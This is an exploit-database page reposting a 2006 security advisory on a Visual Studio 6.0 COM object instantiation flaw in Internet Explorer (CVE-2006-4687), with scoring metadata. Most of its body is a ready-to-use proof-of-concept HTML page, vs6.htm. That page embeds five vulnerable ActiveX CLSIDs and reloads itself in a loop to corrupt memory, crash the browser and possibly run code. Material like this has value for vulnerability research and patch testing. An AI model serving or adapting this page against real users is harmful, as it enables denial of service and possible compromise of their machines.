Advertisement






Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability

CVE Category Price Severity
CVE-2006-4687 CWE-264 $5000 Medium
Author Risk Exploitation Type Date
Unknown Medium Local 2006-09-05
CPE PURL
cpe:cpe:/a:microsoft:visual_studio:6.0
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:L/UI:N/S:U/C:C/I:C/A:C 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006090001

Below is a copy:

Advisory ID:
XSec-06-07

Advisory Name:
Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability

Release Date:
08/18/2006

Tested on:
Visual Studio 6.0/Internet Explorer 6.0 SP1

Affected version:
Visual Studio 6.0

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
Multiple vulnerability has been found in Visual Studio 6.0 When Internet Explorer tries to instantiate the TCPROPS.DLL, FP30WEC.DLL,mdt2db.dll,mdt2qd.dll,VI30AUT.DLL (Visual Stuido 6.0) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.

Exploit:
=============== vs6.htm start ================

<!--
// Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000/2003

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}
// Info: FpFile Class// ProgID: WECAPI.FpFile.1
// InprocServer32: C:WINDOWSSystemFP30WEC.DLL

// CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60}
// Info: TCExtPage Class
// InprocServer32: C:PROGRA~1MICROS~1CommonToolsTCPROPS.DLL

// CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}
// Info: FpaFile Class// ProgID: FpaFile.FpaFile.1
// InprocServer32: C:WINDOWSsystemVI30AUT.DLL

// CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Query Designer// ProgID: MSDTQueryDesigner2
// InprocServer32: C:Program FilesCommon FilesMicrosoft
SharedMSDesigners98mdt2qd.dll

// CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Database Designer// ProgID:
MSDTDatabaseDesigner2
// InprocServer32: C:Program FilesCommon FilesMicrosoft
SharedMSDesigners98mdt2db.dll
--!>

<html><body>
<object classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object>
<object classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object>
<object classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object>
<object classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object>
<object classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object>
<!--
</body>
<script>location.reload();</script>
</html>

=============== vs6.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=15

About XSec:
We are redhat.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum